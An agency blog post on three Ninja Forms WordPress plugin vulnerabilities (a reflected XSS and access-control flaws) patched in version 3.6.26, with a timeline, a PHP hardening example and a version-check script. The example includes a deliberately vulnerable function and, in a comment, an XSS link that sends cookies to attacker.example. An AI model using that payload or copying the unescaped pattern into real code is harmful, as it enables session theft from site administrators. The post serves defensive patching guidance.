Bajorat Media

Ninja Forms for WordPress: Multiple high-level security vulnerabilities

Ninja Forms for WordPress: Multiple high-level security vulnerabilities in popular WordPress form builder plugin.

There is important news for WordPress website operators using the Ninja Forms plugin. In this article, we discuss the latest developments surrounding the security of this popular plugin and describe the measures you should take to protect your website. Three security vulnerabilities were recently discovered in the widely used Ninja Forms plugin for WordPress. These vulnerabilities could allow attackers to reach protected data that they normally would not be able to access. Fortunately, the developers reacted quickly and made a fixed version of the plugin available.

The security gaps in detail

The three identified vulnerabilities pose a serious threat to websites running the Ninja Forms plugin. One of them is a cross-site scripting (XSS) vulnerability: because a request parameter is not adequately validated and escaped, an attacker can craft a request to the site that carries a malicious script payload, and that script then runs in the browser of the user who opens it, with that user's permissions and access to that user's data. It is important to note that this XSS vulnerability is not persistent (it is reflected): the payload is not stored on the site, so the attacker has to get a victim, typically a logged-in administrator, to open a crafted link or submit a crafted request. The other vulnerabilities concern access control: because of faulty authorization checks, unauthorized parties could access form submissions. Severity ratings for these vulnerabilities had not yet been officially assigned at the time of writing.
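To make the reflected-XSS pattern concrete, the following is an added, illustrative example and not code from Ninja Forms: a WordPress admin page that echoes a request parameter unescaped, next to a hardened version that checks capabilities and a nonce, whitelists the value and escapes on output. The page slug `nf_demo`, the `status` parameter and the nonce action `nf_demo_filter` are assumptions for the illustration.

```php
<?php
// Illustrative reflected-XSS pattern in a WordPress admin page and its hardened form.
// Added example for this article; NOT code from Ninja Forms. The "nf_demo" page,
// the "status" parameter and the "nf_demo_filter" nonce action are assumed.

// --- Vulnerable: a request parameter is echoed back without validation or escaping. ---
// A crafted link such as
//   /wp-admin/admin.php?page=nf_demo&status=<script>fetch('https://attacker.example/?c='%2Bdocument.cookie)</script>
// executes in the browser of any logged-in user who opens it. Nothing is stored on the
// site, so the XSS is reflected (non-persistent): the attacker must get a victim to click.
function nf_demo_render_vulnerable() {
    $status = isset( $_GET['status'] ) ? $_GET['status'] : '';
    echo '<div class="notice"><p>Filter: ' . $status . '</p></div>';
}

// --- Hardened: verify the request, whitelist the value, and escape on output. ---
function nf_demo_render_hardened() {
    // 1. Only users who may manage the site get this far.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', 'Forbidden', array( 'response' => 403 ) );
    }
    // 2. Require a valid nonce so a link forged by a third party is rejected
    //    (check_admin_referer() stops execution on failure).
    check_admin_referer( 'nf_demo_filter', '_wpnonce' );

    // 3. Validate: only values we expect are accepted; anything else falls back to a default.
    $allowed = array( 'all', 'read', 'unread' );
    $status  = isset( $_GET['status'] ) ? sanitize_key( wp_unslash( $_GET['status'] ) ) : 'all';
    if ( ! in_array( $status, $allowed, true ) ) {
        $status = 'all';
    }

    // 4. Escape at the point of output, even though the value is already whitelisted.
    echo '<div class="notice"><p>Filter: ' . esc_html( $status ) . '</p></div>';
}

// Links that lead to the hardened page carry the nonce the handler checks.
function nf_demo_filter_link( $status ) {
    $url = add_query_arg(
        array( 'page' => 'nf_demo', 'status' => $status ),
        admin_url( 'admin.php' )
    );
    return esc_url( wp_nonce_url( $url, 'nf_demo_filter', '_wpnonce' ) );
}
```

The nonce alone does not stop XSS (a user could still paste a malicious value into a URL they themselves open), which is why validation and output escaping remain the actual defence; the nonce and capability check limit who can reach the code path and make a forged link from a third party fail before any output is produced.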

The solution: the patch

The developers of the Ninja Forms plugin responded quickly to the discovery of these security vulnerabilities. They stated that the security issues were fixed in version 3.6.26 of the plugin. All users of the plugin are strongly advised to update to this version or later as soon as possible to protect their websites.

About the Ninja Forms plugin

The Ninja Forms plugin is a popular tool for WordPress website administrators. It allows you to create forms for website visitors and currently has over 800,000 active installations. It is known as one of the most popular form builder plugins for WordPress and is developed by Saturday Drive. The plugin is a free form builder for WordPress with which you can create almost any type of form you can imagine, from simple contact forms to event registrations, file uploads, payments and more.

Timeline of events

On June 22, 2023, the vulnerabilities were discovered and reported to the plugin vendor. On July 4, 2023, Ninja Forms version 3.6.26 was released to address the reported issues. On July 25, 2023, the vulnerabilities were recorded in the Patchstack vulnerability database. The vulnerabilities are therefore publicly known and a patch is available. If you use Ninja Forms on your WordPress website, you should check immediately whether the patched version is installed.
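One way to perform that check from the command line, as an added example for this article (not part of the Ninja Forms project): read the `Version:` plugin header from the plugin's main file and compare it with the fixed release 3.6.26 using PHP's `version_compare`. The file path `wp-content/plugins/ninja-forms/ninja-forms.php` is assumed to be the plugin's main file; run the script from the WordPress root directory.

```php
<?php
// Added example for this article (not Ninja Forms' own code): report whether the
// installed Ninja Forms is at or above the fixed release 3.6.26 named in the article.
// Assumed: the plugin's main file is wp-content/plugins/ninja-forms/ninja-forms.php
// and carries a standard "Version:" plugin header. Run from the WordPress root:
//   php check-ninja-forms.php
const NF_FIXED_VERSION = '3.6.26';
const NF_MAIN_FILE     = 'wp-content/plugins/ninja-forms/ninja-forms.php';

/**
 * Extract the "Version:" header from the contents of a plugin file.
 * Mirrors the header pattern WordPress itself reads (comment prefix, key, value),
 * and strips a trailing "*/" or "?>" that may follow the value on the same line.
 */
function nf_version_from_header( $contents ) {
    if ( preg_match( '/^[ \t\/*#@]*Version:(.*)$/mi', $contents, $m ) ) {
        return trim( preg_replace( '/\s*(?:\*\/|\?>).*/', '', $m[1] ) );
    }
    return null;
}

/** True when $installed already contains the fix (3.6.26 or later). */
function nf_is_patched( $installed ) {
    return version_compare( $installed, NF_FIXED_VERSION, '>=' );
}

/** Human-readable status line for the plugin file at $path. */
function nf_report( $path ) {
    if ( ! is_readable( $path ) ) {
        return "Ninja Forms not found at $path (not installed, or installed elsewhere).";
    }
    $version = nf_version_from_header( file_get_contents( $path ) );
    if ( $version === null ) {
        return "Could not read the Version header from $path.";
    }
    return nf_is_patched( $version )
        ? "Ninja Forms $version: patched (>= " . NF_FIXED_VERSION . ")."
        : "Ninja Forms $version: VULNERABLE, update to " . NF_FIXED_VERSION . " or later.";
}

if ( PHP_SAPI === 'cli' ) {
    echo nf_report( NF_MAIN_FILE ), PHP_EOL;
}
```

Where WP-CLI is available, `wp plugin get ninja-forms --field=version` returns the same version string and can be compared the same way; the header-parsing script is useful on hosts where WP-CLI is not installed or where you want to scan many sites from a maintenance job.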

Conclusion

In today’s digital world, it is essential to stay up to date with the latest security developments. The discovery of these vulnerabilities in the Ninja Forms plugin highlights the need to always use the latest versions of plugins and other software tools. By updating to the latest version of the Ninja Forms plugin, you can ensure that your website is protected from these specific threats. Our agency offers WordPress maintenance services and security monitoring for WordPress. If you don’t want to be responsible for constant monitoring of WordPress or your plugins yourself, leave this work to us. Learn more about our WordPress maintenance services here.
